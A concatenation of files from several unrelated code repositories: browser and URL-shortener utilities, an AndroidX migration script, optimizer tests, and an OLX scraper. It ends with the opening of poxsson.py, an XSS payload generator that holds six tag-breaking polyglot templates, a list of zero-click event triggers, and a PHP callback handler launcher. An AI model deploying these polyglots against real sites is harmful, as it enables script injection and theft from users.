    mocked_browser.open_new_tab.assert_called_once_with("https://www.python.org")
def test_invalid_destination():
    """A non-str, non-list destination must raise InvalidDestinationError."""
    with pytest.raises(InvalidDestinationError):
        wrappedbrowser.open(5)
|
woodpecker324/wrappedbrowser | wrappedbrowser/errors.py | """Errors for `wrappedbrowser`"""
class BaseWrappedbrowserError(Exception):
    """The base error class for the `wrappedbrowser` package.

    All `wrappedbrowser` error classes should inherit from this so callers
    can catch every package error with a single except clause."""
    pass
class InvalidDestinationError(BaseWrappedbrowserError):
    """Raised when the destination is neither a url string nor a list of
    url strings."""
    pass
|
woodpecker324/wrappedbrowser | wrappedbrowser/wrappedbrowser.py | <reponame>woodpecker324/wrappedbrowser
# -*- coding: utf-8 -*-
"""Main module."""
import webbrowser
from wrappedbrowser.errors import InvalidDestinationError
def open(destination, browser_type=None):
    """Opens a single url or a list of urls.

    ``destination``:
        If it's a string, it's opened if possible in a new window.
        If it's a list, all url-s are opened (the first in a new window,
        the rest in new tabs). An empty list is a no-op.
    ``browser_type``:
        Optional.
        If provided, it's passed to the `webbrowser.get` function.

    Raises:
        InvalidDestinationError: if *destination* is neither str nor list.
    """
    browser = _get_browser(browser_type)
    if isinstance(destination, str):
        browser.open_new(destination)
        return
    if isinstance(destination, list):
        # BUG FIX: an empty list used to crash with IndexError inside
        # _open_multiple (urls[0]); treat it as "nothing to open".
        if destination:
            _open_multiple(destination, browser)
        return
    raise InvalidDestinationError
def _open_multiple(urls, browser):
    """Open the first url in a new window and the remainder in new tabs."""
    browser.open_new(urls[0])
    for url in urls[1:]:
        browser.open_new_tab(url)
def _get_browser(btype):
    """Resolve a webbrowser controller, honouring an optional type name."""
    if btype is not None:
        return webbrowser.get(btype)
    return webbrowser.get()
|
yeswanth/MigrateToAndroidX | migrateToAndroidX.py | import csv
import glob
import os
import argparse
# Paths are resolved relative to the directory the script is launched from;
# the mapping CSV must sit next to the invocation point.
cwd = os.getcwd()
csvfile_path = cwd + "/androidx-class-mapping.csv"
csvfile = open(csvfile_path)
# Only rows whose old name starts with one of these android.support
# prefixes are rewritten to androidx.
to_include_replacement_patterns = [
    "android.support.annotation",
    "android.support.annotation.RequiresPermission",
    "android.support.design",
    "android.support.v4",
]
# Glob pattern for Java sources inside an Android module.
search_string = "**/src/main/java/**/*.java"
"""
1. Looks at the csv file
2. Looks for the patterns
3. Returns a dictionary of old import and new import
"""
def get_replacements():
replacements = {}
for row in csv.reader(csvfile):
for pattern in to_include_replacement_patterns:
if row[0].find(pattern) == 0:
replacements[row[0]] = row[1]
return replacements
"""
1. Looks for all the files that fall into the pattern
2. It searches for the old imports in each of the file and replaces
with the new imports
3. Saves the files after replacing
"""
def search_files(file_path):
i = 0
replacements = get_replacements()
file_names = glob.glob(file_path + search_string,recursive=True)
for file_name in file_names:
file_data = open(file_name, 'r').read()
for k,v in replacements.items():
if file_data.find(k) != -1:
i = i + 1
print(file_name,k,v)
file_data = file_data.replace(k,v)
open(file_name, 'w').write(file_data)
print("== Migrated ",i+1, " files to AndroidX imports ==\n")
if __name__ == '__main__':
    # CLI entry point: --node_modules points at the React-Native
    # node_modules folder whose Java sources should be migrated.
    parser = argparse.ArgumentParser(description='Migrate your React-Native app to use AndroidX')
    parser.add_argument('--node_modules', dest='node_modules_path', help='Node Modules folder location')
    args = parser.parse_args()
    if args.node_modules_path:
        search_files(args.node_modules_path)
    else:
        print("Invalid arguments. Use -h to see help on how to use this script")
|
pergrin/fictional-happiness-front | app.py | import streamlit as st
import requests
def send_request(text, length):
    """POST the base text and target length to the prediction endpoint.

    Returns:
        tuple: (HTTP status code, requests.Response object)
    """
    api_url = 'https://finished-fictional-happiness-pergrin.endpoint.ainize.ai/predict'
    payload = {
        'base_text': (None, text),
        'length': (None, length),
    }
    response = requests.post(api_url, data=payload)
    return response.status_code, response
st.title("Joint Entity and Relation extraction")
st.header("Get Entities and Relations amongst ")
length_slider = st.sidebar.slider("Length", 0, 300)
base_story = st.text_input("Type Base Story", "\"In our current research into the design of cognitively well-motivated interfaces relying primarily on the display of graphical information, we have observed that graphical information alone does not provide sufficient support to users-particularly when situations arise that do not simply conform to the users' expectations. This can occur due to too much information being requested, too little, information of the wrong kind, etc.. To solve this problem, we are working towards the integration of natural language generation to augment the interaction\"")
if st.button("Submit"):
if length_slider == 0:
st.warning("Please define the length")
else:
status_code, response = send_request(base_story, length_slider)
if status_code == 200:
prediction = response.json()
st.success(prediction["prediction"])
else:
st.error(str(status_code) + " Error")
|
Golbstein/BayesianOptimization | tests/test_bayesian_optimization.py | <filename>tests/test_bayesian_optimization.py
import pytest
import numpy as np
from bayes_opt import UtilityFunction
from bayes_opt import BayesianOptimization
from bayes_opt.logger import ScreenLogger
from bayes_opt.event import Events, DEFAULT_EVENTS
def target_func(**kwargs):
    # arbitrary target func: the sum of all parameter values
    total = 0
    for value in kwargs.values():
        total += value
    return total
# Shared 2-D search space used by every test below.
PBOUNDS = {'p1': (0, 10), 'p2': (0, 10)}
def test_register():
    """Registering observations grows the space; duplicates raise KeyError."""
    optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
    assert len(optimizer.space) == 0
    optimizer.register(params={"p1": 1, "p2": 2}, target=3)
    assert len(optimizer.res) == 1
    assert len(optimizer.space) == 1
    optimizer.space.register(params={"p1": 5, "p2": 4}, target=9)
    assert len(optimizer.res) == 2
    assert len(optimizer.space) == 2
    # Re-registering an already observed point must be rejected.
    with pytest.raises(KeyError):
        optimizer.register(params={"p1": 1, "p2": 2}, target=3)
    with pytest.raises(KeyError):
        optimizer.register(params={"p1": 5, "p2": 4}, target=9)
def test_probe_lazy():
    """Lazy probes only queue points; the space stays empty."""
    optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
    optimizer.probe(params={"p1": 1, "p2": 2}, lazy=True)
    assert len(optimizer.space) == 0
    assert len(optimizer._queue) == 1
    optimizer.probe(params={"p1": 6, "p2": 2}, lazy=True)
    assert len(optimizer.space) == 0
    assert len(optimizer._queue) == 2
    # Duplicate lazy probes are queued again (no dedup at queue time).
    optimizer.probe(params={"p1": 6, "p2": 2}, lazy=True)
    assert len(optimizer.space) == 0
    assert len(optimizer._queue) == 3
def test_probe_eager():
    """Eager probes evaluate immediately and update the running maximum."""
    optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
    optimizer.probe(params={"p1": 1, "p2": 2}, lazy=False)
    assert len(optimizer.space) == 1
    assert len(optimizer._queue) == 0
    assert optimizer.max["target"] == 3
    assert optimizer.max["params"] == {"p1": 1, "p2": 2}
    optimizer.probe(params={"p1": 3, "p2": 3}, lazy=False)
    assert len(optimizer.space) == 2
    assert len(optimizer._queue) == 0
    assert optimizer.max["target"] == 6
    assert optimizer.max["params"] == {"p1": 3, "p2": 3}
    # Probing an already-known point eagerly is a no-op on the space.
    optimizer.probe(params={"p1": 3, "p2": 3}, lazy=False)
    assert len(optimizer.space) == 2
    assert len(optimizer._queue) == 0
    assert optimizer.max["target"] == 6
    assert optimizer.max["params"] == {"p1": 3, "p2": 3}
def test_suggest_at_random():
    """With no observations, suggestions still fall inside the bounds."""
    util = UtilityFunction(kind="poi", kappa=5, xi=0)
    optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
    for _ in range(50):
        sample = optimizer.space.params_to_array(optimizer.suggest(util))
        assert len(sample) == optimizer.space.dim
        assert all(sample >= optimizer.space.bounds[:, 0])
        assert all(sample <= optimizer.space.bounds[:, 1])
def test_suggest_with_one_observation():
    """After one observation, suggestions remain within the bounds."""
    util = UtilityFunction(kind="ucb", kappa=5, xi=0)
    optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
    optimizer.register(params={"p1": 1, "p2": 2}, target=3)
    for _ in range(5):
        sample = optimizer.space.params_to_array(optimizer.suggest(util))
        assert len(sample) == optimizer.space.dim
        assert all(sample >= optimizer.space.bounds[:, 0])
        assert all(sample <= optimizer.space.bounds[:, 1])
    # Determinism check kept for reference; disabled upstream.
    # suggestion = optimizer.suggest(util)
    # for _ in range(5):
    #     new_suggestion = optimizer.suggest(util)
    #     assert suggestion == new_suggestion
def test_prime_queue_all_empty():
    """Priming an empty, unobserved optimizer queues exactly one random point."""
    opt = BayesianOptimization(target_func, PBOUNDS, random_state=1)
    assert (len(opt._queue), len(opt.space)) == (0, 0)
    opt._prime_queue(init_points=0)
    assert (len(opt._queue), len(opt.space)) == (1, 0)
def test_prime_queue_empty_with_init():
    """With init_points=5 the queue is primed with exactly five points."""
    opt = BayesianOptimization(target_func, PBOUNDS, random_state=1)
    assert (len(opt._queue), len(opt.space)) == (0, 0)
    opt._prime_queue(init_points=5)
    assert (len(opt._queue), len(opt.space)) == (5, 0)
def test_prime_queue_with_register():
    """A pre-registered observation suppresses the fallback random point."""
    opt = BayesianOptimization(target_func, PBOUNDS, random_state=1)
    assert (len(opt._queue), len(opt.space)) == (0, 0)
    opt.register(params={"p1": 1, "p2": 2}, target=3)
    opt._prime_queue(init_points=0)
    assert (len(opt._queue), len(opt.space)) == (0, 1)
def test_prime_queue_with_register_and_init():
    """Explicit init_points are queued even when an observation already exists."""
    opt = BayesianOptimization(target_func, PBOUNDS, random_state=1)
    assert (len(opt._queue), len(opt.space)) == (0, 0)
    opt.register(params={"p1": 1, "p2": 2}, target=3)
    opt._prime_queue(init_points=3)
    assert (len(opt._queue), len(opt.space)) == (3, 1)
def test_prime_subscriptions():
    """_prime_subscriptions installs the default logger but never clobbers manual subscribers."""
    optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
    optimizer._prime_subscriptions()
    # Every default event must be observed by a ScreenLogger exposing update().
    for event in DEFAULT_EVENTS:
        subscribers = list(optimizer._events[event].keys())
        assert all(isinstance(sub, ScreenLogger) for sub in subscribers)
        assert all(hasattr(sub, "update") for sub in subscribers)

    test_subscriber = "test_subscriber"

    def test_callback(event, instance):
        pass

    optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
    optimizer.subscribe(
        event=Events.OPTMIZATION_START,
        subscriber=test_subscriber,
        callback=test_callback,
    )

    def assert_manual_subscription():
        start_events = optimizer._events[Events.OPTMIZATION_START]
        assert all(sub == test_subscriber for sub in start_events.keys())
        assert all(cb == test_callback for cb in start_events.values())

    # The manual observer is registered...
    assert_manual_subscription()
    # ...and priming must not overwrite it.
    optimizer._prime_subscriptions()
    assert_manual_subscription()
    assert optimizer._events[Events.OPTMIZATION_STEP] == {}
    assert optimizer._events[Events.OPTMIZATION_END] == {}
    with pytest.raises(KeyError):
        optimizer._events["other"]
def test_set_bounds():
    """set_bounds updates known keys in place and silently ignores unknown ones."""
    bounds = {
        'p1': (0, 1),
        'p3': (0, 3),
        'p2': (0, 2),
        'p4': (0, 4),
    }
    optimizer = BayesianOptimization(target_func, bounds, random_state=1)

    def assert_bounds(lower, upper):
        assert all(optimizer.space.bounds[:, 0] == np.array(lower))
        assert all(optimizer.space.bounds[:, 1] == np.array(upper))

    # An unknown key is a no-op.
    optimizer.set_bounds({"other": (7, 8)})
    assert_bounds([0, 0, 0, 0], [1, 2, 3, 4])
    # A known key is updated (keys are sorted alphabetically internally).
    optimizer.set_bounds({"p2": (1, 8)})
    assert_bounds([0, 1, 0, 0], [1, 8, 3, 4])
def test_set_gp_params():
    """set_gp_params only changes the parameters it is explicitly given."""
    optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
    scenarios = [
        (None, 1e-6, 25),                            # defaults
        ({"alpha": 1e-2}, 1e-2, 25),                 # alpha only
        ({"n_restarts_optimizer": 7}, 1e-2, 7),      # restarts only
    ]
    for params, expected_alpha, expected_restarts in scenarios:
        if params is not None:
            optimizer.set_gp_params(**params)
        assert optimizer._gp.alpha == expected_alpha
        assert optimizer._gp.n_restarts_optimizer == expected_restarts
def test_maximize():
    """maximize drains the queue, grows the space and fires observer events."""
    from sklearn.exceptions import NotFittedError

    class Tracker:
        """Counts how often each optimization event fires."""

        def __init__(self):
            self.start_count = 0
            self.step_count = 0
            self.end_count = 0

        def update_start(self, event, instance):
            self.start_count += 1

        def update_step(self, event, instance):
            self.step_count += 1

        def update_end(self, event, instance):
            self.end_count += 1

        def reset(self):
            self.__init__()

    optimizer = BayesianOptimization(target_func, PBOUNDS,
                                     random_state=np.random.RandomState(1))
    tracker = Tracker()
    for event, callback in [
        (Events.OPTMIZATION_START, tracker.update_start),
        (Events.OPTMIZATION_STEP, tracker.update_step),
        (Events.OPTMIZATION_END, tracker.update_end),
    ]:
        optimizer.subscribe(event=event, subscriber=tracker, callback=callback)

    def counts():
        return (tracker.start_count, tracker.step_count, tracker.end_count)

    # No init points, no iterations: one queued point is still evaluated.
    optimizer.maximize(init_points=0, n_iter=0)
    assert optimizer._queue.empty
    assert len(optimizer.space) == 1
    assert counts() == (1, 1, 1)

    # GP kwargs are forwarded through maximize().
    optimizer.maximize(init_points=2, n_iter=0, alpha=1e-2)
    assert optimizer._queue.empty
    assert len(optimizer.space) == 3
    assert optimizer._gp.alpha == 1e-2
    assert counts() == (2, 3, 2)

    optimizer.maximize(init_points=0, n_iter=2)
    assert optimizer._queue.empty
    assert len(optimizer.space) == 5
    assert counts() == (3, 5, 3)
if __name__ == '__main__':
    r"""
    CommandLine:
        python tests/test_bayesian_optimization.py
    """
    # Run this module's tests directly through pytest when executed as a script.
    pytest.main([__file__])
|
3ep-one/urlshortener | urlshortener/requesthandler.py | <filename>urlshortener/requesthandler.py<gh_stars>0
import configparser
from io import BytesIO
import json
from http.server import HTTPServer, BaseHTTPRequestHandler
from UrlShortener import UrlShortener
class HttpHandler(BaseHTTPRequestHandler):
    """HTTP front-end for the URL shortener.

    Accepts POST requests whose JSON body is {"url": "<long url>"} and
    responds with {"<long url>": "<short url>"}. Any other method or a
    missing "url" key yields a 400 response.
    """

    def __init__(self, *args, **kwargs):
        # Bug fix: BaseHTTPRequestHandler is instantiated by HTTPServer once
        # per request with (request, client_address, server); the original
        # zero-argument override broke that protocol. Forward any server
        # arguments to the parent after loading the configuration.
        config = configparser.ConfigParser()
        config.read('handler.ini')
        self.listen_ip = config['httphandler']['ip']
        # Bug fix: HTTPServer needs an int port; configparser returns strings.
        self.listen_port = int(config['httphandler']['port'])
        if args or kwargs:
            super().__init__(*args, **kwargs)

    def do_GET(self):
        # Only POST is supported by this service.
        self.send_response(400)
        self.end_headers()
        self.wfile.write(b'Bad request method!')

    def do_POST(self):
        """Shorten the URL supplied in the JSON request body."""
        content_length = int(self.headers['Content-Length'])
        body = self.rfile.read(content_length)
        response = BytesIO()
        request_body_dict = json.loads(body.decode('utf8'))
        if 'url' in request_body_dict:
            request_url = request_body_dict['url']
            url_shortener = UrlShortener()
            shortend_url = url_shortener.shorten_url(str(request_url))
            json_response = json.dumps({request_url: shortend_url})
            self.send_response(200)
            self.end_headers()
            response.write(json_response.encode('utf8'))
            self.wfile.write(response.getvalue())
        else:
            self.send_response(400)
            self.end_headers()
            response.write(b'Bad request param!')
            self.wfile.write(response.getvalue())

    def handle_requests(self):
        """Start the HTTP server and block forever serving requests."""
        # Bug fix: the bind address used the port twice instead of (ip, port).
        server = HTTPServer((self.listen_ip, self.listen_port), HttpHandler)
        server.serve_forever()
|
3ep-one/urlshortener | urlshortener/__main__.py | from RequestHandler import HttpHandler
def main():
    """Entry point: build the HTTP handler and serve requests forever."""
    HttpHandler().handle_requests()


if __name__ == "__main__":
    main()
|
3ep-one/urlshortener | test/test_urlshortner.py | <filename>test/test_urlshortner.py
import unittest
import mock
from UrlShortener import UrlShortener
from Redis import Redis
import re
class TestUrlShortner(unittest.TestCase):
    """Unit tests for UrlShortener with the Redis backend mocked out."""

    url_shortner = UrlShortener()

    def test_url_encoder_function(self):
        """url_encoder turns a numeric id into its base-N string form."""
        self.assertEqual(self.url_shortner.url_encoder(10000000), 'oCba')

    @mock.patch.object(Redis, 'does_key_exist', return_value=True)
    @mock.patch.object(Redis, 'get_value_by_key', return_value=237)
    def test_shorten_url_key_exist(self, *_):
        """An already-known URL is re-encoded from its stored id."""
        short_url = self.url_shortner.shorten_url('test')
        found = bool(re.search(r'.*/3f$', short_url))
        self.assertEqual(found, True)

    @mock.patch.object(Redis, 'does_key_exist', return_value=False)
    @mock.patch.object(Redis, 'get_value_by_key')
    @mock.patch.object(Redis, 'add_key_value')
    @mock.patch.object(UrlShortener, 'url_encoder', return_value='aB3')
    def test_shorten_url_add_key(self, *_):
        """A brand new URL gets a fresh id and the encoded suffix."""
        short_url = self.url_shortner.shorten_url('test')
        found = bool(re.search(r'.*/aB3$', short_url))
        self.assertEqual(found, True)
if __name__ == '__main__':
    # Allow running this test module directly (outside a test runner).
    unittest.main()
|
3ep-one/urlshortener | urlshortener/redis.py | import redis
import configparser
class Redis:
    """Thin wrapper around a redis connection configured from db.ini."""

    def __init__(self):
        # Bug fix: the configuration must be read *before* connecting -- the
        # original called connect_to_redis() first, so self.redis_host etc.
        # did not exist yet and the connection attempt raised AttributeError.
        config = configparser.ConfigParser()
        config.read('db.ini')
        self.redis_host = config['redis']['host']
        self.redis_port = config['redis']['port']
        self.redis_pass = config['redis']['pass']
        self.redis_db = self.connect_to_redis()

    def connect_to_redis(self):
        """Open and return a redis client using the configured credentials."""
        # Bug fix: the configured password was read but never used
        # (password was hardcoded to None).
        return redis.Redis(
            host=self.redis_host,
            port=self.redis_port,
            password=self.redis_pass)

    def add_key_value(self, key, value):
        """Store value under key."""
        self.redis_db.set(key, value)

    def get_value_by_key(self, key):
        """Return the raw value stored under key (bytes or None)."""
        return self.redis_db.get(key)

    def does_key_exist(self, key):
        """Return True if key is present in the database."""
        # Removed a leftover debug print of the key.
        return bool(self.redis_db.exists(key))

    def remove_key(self, key):
        """Delete key from the database."""
        self.redis_db.delete(key)
|
3ep-one/urlshortener | urlshortener/urlshortener.py | import configparser
from Redis import Redis
class UrlShortener:
    """Maps long URLs to short base-N identifiers backed by Redis."""

    def __init__(self):
        self.redis = Redis()
        # Seed the global id counter on first ever use.
        if not self.redis.does_key_exist('id'):
            self.redis.add_key_value('id', '1')
        config = configparser.ConfigParser()
        config.read('config.ini')
        self.short_url = config['config']['short_url']
        self.accepted_char = config['config']['accepted_char']

    def shorten_url(self, original_url):
        """Return the short URL for original_url, registering it if new."""
        if self.redis.does_key_exist(original_url):
            # Known URL: re-encode the id that was stored for it.
            encoded = self.url_encoder(int(self.redis.get_value_by_key(original_url)))
        else:
            # New URL: assign the next global id and advance the counter.
            assigned_id = int(self.redis.get_value_by_key('id'))
            self.redis.add_key_value(original_url, assigned_id)
            encoded = self.url_encoder(assigned_id)
            self.redis.add_key_value('id', str(assigned_id + 1))
        return self.short_url + encoded

    def url_encoder(self, id):
        """Encode a positive integer id using the configured character set."""
        alphabet = self.accepted_char
        base = len(alphabet)
        digits = []
        remaining = id
        while remaining > 0:
            remaining, digit = divmod(remaining, base)
            digits.append(alphabet[digit])
        return "".join(reversed(digits))
|
FranciscoBurigo/OLX_scrapper | Buscador_de_dados_olx.py | <gh_stars>0
# Codigo buscar dados OLX
#by <NAME>
import pandas as pd
import numpy as np
import requests
from bs4 import BeautifulSoup
import json
from difflib import SequenceMatcher
from selenium import webdriver
import time
from datetime import date
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
import unidecode
# Module-level scratch state shared by the two scraping functions below:
# collected ad URLs, scraped ad records, and the <dt>/<dd> attribute pairs
# of the ad currently being parsed.
ListaURLS = []
listaJson =[]
Dictdt= []
Dictdd= []
########## Collects the ad URLs and stores them in a list #########
def buscaURLsOLX(pages = 10):
    """Scrape the OLX listing pages and append every ad URL to ListaURLS.

    NOTE(review): range(1, pages) visits pages 1..pages-1, i.e. one page
    fewer than the argument suggests -- confirm whether that is intended.
    """
    ErroLink = 0
    for x in range(1, pages):
        url = "https://sc.olx.com.br/florianopolis-e-regiao/imoveis/terrenos/compra?o=" + str(x)
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'}
        page = requests.get(url = url, headers=headers)
        soup = BeautifulSoup(page.content,'lxml')
        itens = soup.find_all("li", {"class" : "sc-1fcmfeb-2 fvbmlV"})
        for a in itens :
            try:
                URL_anuncio = a.find("a")["href"]
                ListaURLS.append(URL_anuncio)
            except:
                # Count listing items whose anchor/href could not be extracted.
                ErroLink = ErroLink + 1
    N_Pag = len(ListaURLS)
    print("O numero de links coletados foi:"+ str(N_Pag) + ", não conseguindo coletar um total de " + str(ErroLink))
    return(ListaURLS)
######### Visits each URL from the list and saves the desired ad data #########
def buscaDadosOLX(ListaURLS):
    """Open every ad URL with headless Chrome and append its details to listaJson."""
    N_Pag = len(ListaURLS)
    for x in range(0, N_Pag):
        url = ListaURLS[x]
        try:
            # Headless Chrome is used because the ad pages are rendered by JS.
            chrome_options = Options()
            chrome_options.add_argument("--headless")
            s = Service('C:/Users/franc/OLX_scrapper/chromedriver.exe')
            browser = webdriver.Chrome(service=s, options = chrome_options)
            browser.get(url)
            time.sleep(5)
            html = browser.page_source
            soup = BeautifulSoup(html,'lxml')
            Titulo = soup.find("h1",{"class" : "sc-45jt43-0 eCghYu sc-ifAKCX cmFKIN"}).get_text()
            Preco = soup.find("h2",{"class" : "sc-1wimjbb-2 iUSogS sc-ifAKCX cmFKIN"}).get_text()
            Preco = Preco.replace("R$","")
            Preco = float(Preco.replace(".",""))
            Descricao = soup.find("span",{"class" : "sc-1sj3nln-1 eOSweo sc-ifAKCX cmFKIN"}).get_text()
            NomeVendedorURL = soup.find("span",{"class": "sc-fBuWsC sc-jGFFOr iNEwhQ sc-hARARD ksmUnv sc-ifAKCX cmFKIN"}).get_text()
            ddclass = soup.find_all("dd",{"class": "sc-1f2ug0x-1 ljYeKO sc-ifAKCX kaNiaQ"})
            dtclass = soup.find_all("dt",{"class": "sc-1f2ug0x-0 cLGFbW sc-ifAKCX cmFKIN"})
            for a in range(0, len(ddclass)):
                # NOTE(review): dt labels are read at index a+1, which skips
                # the first <dt> and will raise IndexError on the last item
                # (silently absorbed by the outer except) -- confirm intended.
                Dictdt.append( unidecode.unidecode(dtclass[a+ 1].get_text()))
                Dictdd.append( unidecode.unidecode(ddclass[a].get_text()))
            dict_tamanho_localizacao = dict(zip(Dictdt, Dictdd))
            # NOTE: this local name shadows the imported json module.
            json = {"Titulo" : Titulo,
                "Preco" : Preco,
                "NomeVendedor" : NomeVendedorURL,
                "Descricao" : Descricao,
                "URL_Anuncio": url
                }
            json.update(dict_tamanho_localizacao)
            listaJson.append(json)
            # Clear the scratch lists so a missing field does not carry the
            # previous ad's values into the next record.
            Dictdt.clear()
            Dictdd.clear()
        except:
            print("Erro para pegar dados")
# Script entry: collect the URLs, scrape each ad, and dump everything to CSV.
buscaURLsOLX()
buscaDadosOLX(ListaURLS)
df = pd.DataFrame(listaJson)
df.to_csv("Terrenos.csv")
|
redcode-labs/poXSSon | poxsson.py | #!/usr/bin/python3
import argparse
import base64
import importlib
import os
import random
import re
import shutil
import socket
import subprocess
import sys

import pyperclip
from huepy import *
from terminaltables import SingleTable

#import atexit
POXSSON_PATH = os.path.realpath(__file__).replace("poxsson.py", "") #Absolute path of the project directory
# Trigger catalogue shown by --list: [event name, compatible tags, usage note].
polyglot_triggers = [
    ["onload","common tags", "0-click"],
    ["onpageshow","body","Works only without DOM dependency"],
    ["onfocus","input, select, a", "Use 'autofocus'for 0click"],
    ["onerror","img, input, object, link, script, video, audio","Specify wrong params to trigger error handling"],
    ["onanimationstart","CSS element","Fired then a CSS animation starts"],
    ["onanimationend","CSS element", "Fires when a CSS animation ends"],
    ["onstart","marquee","Fires on marquee animation start - Firefox only"],
    ["onfinish","marquee","Fires on marquee animation end - Firefox only"],
    ["ontoggle","details","Add ‘open’ attribute for 0-click"]
]
# Polyglot wrapper templates keyed by id; the literal words PAYLOAD and
# TRIGGER are placeholders substituted at generation time in main().
polyglots = {
    "1" : """javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/TRIGGER=PAYLOAD//>""",
    "2" : "\"'--></noscript></noembed></template></title></textarea></style><script><svg TRIGGER=PAYLOAD></script>",
    "3" : "'\"--></title></textarea></style></noscript></noembed></template></frameset><svg TRIGGER=PAYLOAD>",
    "4" : "\"'>-->*/</noscript></title><script><svg TRIGGER=PAYLOAD></script>" ,
    "5" : "\"'--></style></script><svg TRIGGER=PAYLOAD>",
    "6" : """%%0ajavascript:`/*\\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html TRIGGER="/**/ PAYLOAD//'">`"""
}
#Obtains local IP for use with handler
def local_ip():
    """Return the primary local IPv4 address (default LHOST for the handler).

    Connecting a UDP socket does not transmit packets; it only asks the OS
    which interface would route towards the target.
    """
    # Bug fix: use a context manager so the socket is always closed
    # instead of being leaked.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.connect(("8.8.8.8", 80))
        return s.getsockname()[0]
def print_banner():
    """Render the ASCII-art poXSSon banner in green."""
    banner_rows = [
        "{_______        {__ {__  {__ {__ __      {__ __",
        "{__    {__      {__  {__{__  {__{__    {__{__ ",
        "{__    {__      {__    {__    {__ {__      {__ {__      {__ ",
        "{_______   {__  {__  {__{__ {__  {__ {__  {__ {__    {__",
        "{__       {__   {__ {__    {__     {__    {__    {__ {__",
        "{__      {__    {__{__      {__{__    {__{__    {__   {__ {__",
        "{__       {__   {__ {__  {__ __  {__ __    {__    {___  {__ ",
    ]
    print("")
    print("")
    for row in banner_rows:
        print(green(row))
    print("")
#Function for printing metasploit-like tables ;>
def print_table(table_data):
    """Render table_data as a borderless, metasploit-like table.

    Note: mutates table_data by inserting a dashed underline row at index 1.
    """
    underline_row = ["-" * len(header) for header in table_data[0]]
    table_data.insert(1, underline_row)
    table = SingleTable(table_data)
    table.inner_heading_row_border = False
    table.inner_row_border = False
    table.inner_column_border = False
    table.outer_border = False
    table.justify_columns = {0: 'left', 1: 'left', 2: 'left'}
    print(table.table)
    print('')
#Simply lists files under /payloads dir and prints info about them in color
def list_payloads():
    """Print every available payload module, polyglot trigger and wrapper."""
    table_data = [["Name", "Description", "Handler", "Length"]]
    # Only the files directly inside payloads/ are payload modules.
    filenames = next(os.walk(POXSSON_PATH + 'payloads'))[2]
    modules = [
        importlib.import_module("payloads." + fname.replace(".py", ''))
        for fname in filenames
        if fname.endswith('.py') and 'init' not in fname
    ]
    for mod in modules:
        # A module with a `handler` attribute ships its own PHP handler.
        has_handler = hasattr(mod, "handler")
        table_data.append([red(mod.name), blue(mod.description), has_handler, len(mod.payload)])
    print(info(f"Available payloads: {len(modules)}"))
    print("")
    print_table(table_data)
    print("")
    # Bug fix: build the header into a fresh list. The original inserted the
    # header into the module-level polyglot_triggers (and kept insert()'s
    # None return), permanently mutating the global and inflating the
    # reported trigger count by one.
    triggers_table = [["Name", "Compatibility", "Description"]] + polyglot_triggers
    print(info(f"Available triggers: {len(polyglot_triggers)}"))
    print("")
    print_table(triggers_table)
    print("")
    print(good(f"Available polyglots: {len(polyglots)}"))
    for idn in polyglots:
        print(f"[{idn}] -> {polyglots[idn].replace('PAYLOAD', red('PAYLOAD')).replace('TRIGGER', green('TRIGGER'))}")
    print("")
#Shows info (options, description, size...) about payload selected with "--payload" flag
def print_payload_info(payload_mod):
    """Print name, description, length and the option tables of a payload module."""
    payload_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']]
    handler_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']]
    handler = hasattr(payload_mod, "handler")
    # Option entries are [name, description, default_value]; tolerate modules
    # without options or with malformed/empty entries (e.g. options=[[]]).
    try:
        for opt in getattr(payload_mod, "options", []):
            payload_options_table_data.append([opt[0], opt[1], opt[2]])
    except IndexError:
        pass
    try:
        for opt in getattr(payload_mod, "handler_options", []):
            handler_options_table_data.append([opt[0], opt[1], opt[2]])
    except IndexError:
        pass
    print(info(f"Name: {payload_mod.name}"))
    print(info(f"Description: {payload_mod.description}"))
    print(info(f"Length: {len(payload_mod.payload)} bytes"))
    print(info(f"Handler: {handler}"))
    if len(payload_options_table_data) > 1:
        print("")
        # Bug fix: huepy's info() returns a string; the original discarded
        # the return value so the section headers were never shown.
        print(info("Payload options:"))
        print("")
        print_table(payload_options_table_data)
    if len(handler_options_table_data) > 1:
        print("")
        print(info("Handler options:"))
        print("")
        print_table(handler_options_table_data)
#def test_payload(payload_name):
# pass
#I was so high writing this function lol
#But I suppose it just copies a PHP handler to a directory (?)
#And launches it from there using PHP inline interpreter
def start_php_handler(php_code):
    """Serve php_code with PHP's built-in web server on <local_ip>:8000.

    Blocks until the PHP process exits (e.g. Ctrl-C); afterwards the
    temporary handler directory is removed.
    """
    handler_dir = f"{POXSSON_PATH}php_handler_dir"
    # Bug fix: the directory may not exist yet; create it instead of
    # failing on open().
    os.makedirs(handler_dir, exist_ok=True)
    with open(f"{handler_dir}/handler.php", "w+") as handler_file:
        handler_file.write(php_code)
    # Pass argv as a list (shell=False): no shell string interpolation.
    subprocess.call(["php", "-t", handler_dir, "-S", f"{local_ip()}:8000"])
    shutil.rmtree(handler_dir, ignore_errors=True)
#Inserts default options, and also options passed as NAME=VAL in command line
def insert_options(payload_code, payload_options, cli_options):
    """Fill the upper-case option placeholders in payload_code.

    Values supplied on the command line as NAME=value take precedence; any
    option not mentioned there falls back to its default from payload_options
    (entries are [name, description, default_value]).
    """
    result = payload_code
    for cli_option in cli_options:
        parts = cli_option.split("=")
        result = result.replace(parts[0].upper(), parts[1])
    joined_cli = ''.join(cli_options)
    for option in payload_options:
        option_name = option[0]
        default_value = option[2]
        if default_value == "" and "=" in joined_cli:
            # Warn the user that an option was left unset.
            print(info(f"{option_name.upper()} option is empty"))
